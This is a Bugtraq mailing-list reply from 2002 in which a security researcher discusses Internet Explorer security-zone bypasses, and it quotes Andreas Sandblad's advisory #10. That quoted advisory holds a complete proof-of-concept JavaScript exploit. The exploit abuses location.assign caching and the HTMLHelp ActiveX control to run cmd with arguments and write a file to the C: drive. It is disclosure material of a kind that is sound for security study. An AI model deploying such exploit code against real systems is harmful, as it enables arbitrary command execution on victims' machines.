Unless I am missing something, this is definitely not a vulnerability in itself but just a practical demonstration of the "assign method caching" vulnerability. Executing programs with or without parameters also become pointless once you have complete access to a local security zone (in this case, given by the "assign method caching" vuln), as demonstrated by http-equiv quite some times. Circumventing the zone barriers allow you to (among others) retrieve the location of that funny malware you just planted in the users temporary internet files, and subsequently execute it. The HTMLHelp Control used in this example only has the authority to execute commands at all because it is being used from a local security zone. As such, when Microsoft are claiming that "the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability", they are in my opinion correct. Despite this, it is always interesting to have more approaches to program execution for demonstratory purposes once you get your foot inside the door of a local security zone, especially since the "codebase localpath" approach is practically filtered anywhere in its pure form. IE6 SP1 did include some early attempts at preventing any interaction between security zones (specifically from the Internet zone to any local zone). That attempt was broken with the object redirect approach. It will be interesting to see what Microsoft comes up with next to prevent interaction between security zones. Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http://www.PivX.com -----Original Message----- From: Andreas Sandblad [mailto:sandblad@acc.umu.se] Sent: 6. november 2002 20:48 To: bugtraq@securityfocus.com Subject: How to execute programs with parameters in IE - Sandblad advisory #10 --------------------------- CUT HERE --------------------------- <*script> // "How to execute programs with parameters in IE", 2002-11-06 // Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se prog = 'cmd'; args = '/k echo You are vulnerable (Sandblad #10) & '+ 'echo Sandblad #10 > c:/vulnerable.txt & winmine'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:')"); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> --------------------------- CUT HERE ---------------------------
